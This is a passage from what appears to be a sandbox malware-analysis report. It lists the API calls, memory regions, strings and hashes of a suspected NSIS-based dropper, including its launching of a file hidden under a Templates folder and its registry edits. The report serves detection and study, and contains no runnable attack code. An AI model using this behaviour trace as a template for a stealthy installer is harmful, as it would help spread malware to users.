                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\synkefrit
                                                                                              • API String ID: 1892508949-2623163684
                                                                                              • Opcode ID: 396cb8d654c4bd1d9b031a888da28658032143c202452067c1c7f2463867fd2c
                                                                                              • Instruction ID: 6ea9d176647784ede47dca84986b1d8040ea6f7a989068fde2debc666839409d
                                                                                              • Opcode Fuzzy Hash: 396cb8d654c4bd1d9b031a888da28658032143c202452067c1c7f2463867fd2c
                                                                                              • Instruction Fuzzy Hash: A2112B35404141ABDF217B650C405BF27F0EA92315738463FF591B22E2C63C0942A63F
                                                                                              APIs
                                                                                              • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0079FD48,Error launching installer), ref: 004054C6
                                                                                              • CloseHandle.KERNEL32(?), ref: 004054D3
                                                                                              Strings
                                                                                              • Error launching installer, xrefs: 004054B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
                                                                                              • String ID: Error launching installer
                                                                                              • API String ID: 3712363035-66219284
                                                                                              • Opcode ID: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
                                                                                              • Instruction ID: 542db3fa263e6c3fd8363e81c561fcb1d1edc85eb607383f0aa2fc0e1be44d1e
                                                                                              • Opcode Fuzzy Hash: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
                                                                                              • Instruction Fuzzy Hash: 95E0BFF4A002097FEB10AB64ED45F7B7BACEB00645F108561FD10F6190D674A9549A79
                                                                                              APIs
                                                                                                • Part of subcall function 00404F25: lstrlenA.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,00000000,0078FCF8,771B23A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
                                                                                                • Part of subcall function 00404F25: lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,00000000,0078FCF8,771B23A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
                                                                                                • Part of subcall function 00404F25: lstrcatA.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,00000000,0078FCF8,771B23A0), ref: 00404F81
                                                                                                • Part of subcall function 00404F25: SetWindowTextA.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll), ref: 00404F93
                                                                                                • Part of subcall function 00404F25: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                                                • Part of subcall function 00404F25: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                                                • Part of subcall function 00404F25: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                                                • Part of subcall function 0040549D: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0079FD48,Error launching installer), ref: 004054C6
                                                                                                • Part of subcall function 0040549D: CloseHandle.KERNEL32(?), ref: 004054D3
                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 3521207402-0
                                                                                              • Opcode ID: 5300586a977f739bb3b95f406a8e475e6bf3f04e18eaf9760632a053cb3b61ce
                                                                                              • Instruction ID: f3d89628ed1a2f536a51da31c0d1f3bff78da2cc26dd4d815c67a837da1bf94c
                                                                                              • Opcode Fuzzy Hash: 5300586a977f739bb3b95f406a8e475e6bf3f04e18eaf9760632a053cb3b61ce
                                                                                              • Instruction Fuzzy Hash: 53016D31904114EBDF11AFA1CD89A9E7B72EF00344F10817BF601B52E1C7789A819B9A
                                                                                              APIs
                                                                                                • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000002DB,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
                                                                                              • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
                                                                                              • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003,00020019), ref: 004024C3
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Enum$CloseOpenValue
                                                                                              • String ID:
                                                                                              • API String ID: 167947723-0
                                                                                              • Opcode ID: cb8d7e7e292cd3f0bc6c1f59dcd71b3952a721e666c2518bc090900559d161d0
                                                                                              • Instruction ID: 6b9a29d885729d806435ba0af982d5db400a82278970f5f8cd94cba27a839736
                                                                                              • Opcode Fuzzy Hash: cb8d7e7e292cd3f0bc6c1f59dcd71b3952a721e666c2518bc090900559d161d0
                                                                                              • Instruction Fuzzy Hash: EDF0AD72904200AFEB11AF659E88EBB7A6DEB80344B10443AF505A61C0D6B849449A7A
                                                                                              APIs
                                                                                              • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\synkefrit,?), ref: 00401E30
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\synkefrit, xrefs: 00401E1B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExecuteShell
                                                                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\synkefrit
                                                                                              • API String ID: 587946157-2623163684
                                                                                              • Opcode ID: b0f1f290dab42d7627ac84af391824cda61e1d1b78d8d453e3c5aed2a9c0ee07
                                                                                              • Instruction ID: 340d0feeeb8292155287dfb6c97f983a5cfd8bfca1fa3215745e1e0026b9813b
                                                                                              • Opcode Fuzzy Hash: b0f1f290dab42d7627ac84af391824cda61e1d1b78d8d453e3c5aed2a9c0ee07
                                                                                              • Instruction Fuzzy Hash: 6BF04632B041006FDB10ABB18D4AF5E27A8AB61319F20493BF141F70C2DAFC88419B18
                                                                                              APIs
                                                                                                • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000002DB,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
                                                                                              • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3677997916-0
                                                                                              • Opcode ID: 5036ecff7da7e931cef0e4d9af925887b92852862d1d3796e4000a238184e6f1
                                                                                              • Instruction ID: 3b61e3a0dd356b8eb8c6217664be55b6a4c5c12d426b24930886ed9b9a2887e1
                                                                                              • Opcode Fuzzy Hash: 5036ecff7da7e931cef0e4d9af925887b92852862d1d3796e4000a238184e6f1
                                                                                              • Instruction Fuzzy Hash: 5911A771905205EFDF14DF64CA889AEBBB4EF11348F20443FE141B62C0D2B84A45DB5A
                                                                                              APIs
                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                              • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: b63ad44f694a207690e677ec35bda8f999f5426b301403e6904e10af90410016
                                                                                              • Instruction ID: 00097469377630013da62b9f7c31fbdee85021c234e60ac5accdaffcc3ed26dc
                                                                                              • Opcode Fuzzy Hash: b63ad44f694a207690e677ec35bda8f999f5426b301403e6904e10af90410016
                                                                                              • Instruction Fuzzy Hash: BE01F4316242209BF7194B389C04B6A3698E751354F10813BF811F62F1D678DC028B4D
                                                                                              APIs
                                                                                                • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000002DB,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
                                                                                              • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 00402327
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseDeleteOpenValue
                                                                                              • String ID:
                                                                                              • API String ID: 849931509-0
                                                                                              • Opcode ID: 48c6a4f1ec7a86bc1051c3bdbeac554186010e92678d5b1d819c5a0f771793f2
                                                                                              • Instruction ID: 97ae11083f28a0faafd94fb7fe42009bced1e39793468f635283aee611ee1e77
                                                                                              • Opcode Fuzzy Hash: 48c6a4f1ec7a86bc1051c3bdbeac554186010e92678d5b1d819c5a0f771793f2
                                                                                              • Instruction Fuzzy Hash: A2F04433A00110AFEB10BBA48A4EAAE7269AB50344F14443BF201B61C1DABD4D12966D
                                                                                              APIs
                                                                                              • ShowWindow.USER32(00010424), ref: 00401579
                                                                                              • ShowWindow.USER32(0001041E), ref: 0040158E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1268545403-0
                                                                                              • Opcode ID: 58339daa48f2abfaa16ef55595ad2450e584a2864855a69756b41114902e3615
                                                                                              • Instruction ID: 8b304e13c4ff4e58b2746d459b27b343ece49c0a97bab20a5a043a2c5b6af2c1
                                                                                              • Opcode Fuzzy Hash: 58339daa48f2abfaa16ef55595ad2450e584a2864855a69756b41114902e3615
                                                                                              • Instruction Fuzzy Hash: DEF0E577A082905FEB15CB64EDC086D7BF2EB8631075445BBD101A3691C2785C08C728
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004060D2
                                                                                                • Part of subcall function 00406037: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040604E
                                                                                                • Part of subcall function 00406037: wsprintfA.USER32 ref: 00406087
                                                                                                • Part of subcall function 00406037: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040609B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2547128583-0
                                                                                              • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                              • Instruction ID: 3e97459997e7f7d7039c0cd31b40a13ca7cd82e20333033f2d5c91e802436a08
                                                                                              • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                              • Instruction Fuzzy Hash: 9DE08632644121AAD32097749E0493B72ACAA84751302093EF506F2180D7389C21A669
                                                                                              APIs
                                                                                              • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\3Pd480eWHA.exe,80000000,00000003), ref: 00405983
                                                                                              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCreate
                                                                                              • String ID:
                                                                                              • API String ID: 415043291-0
                                                                                              • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
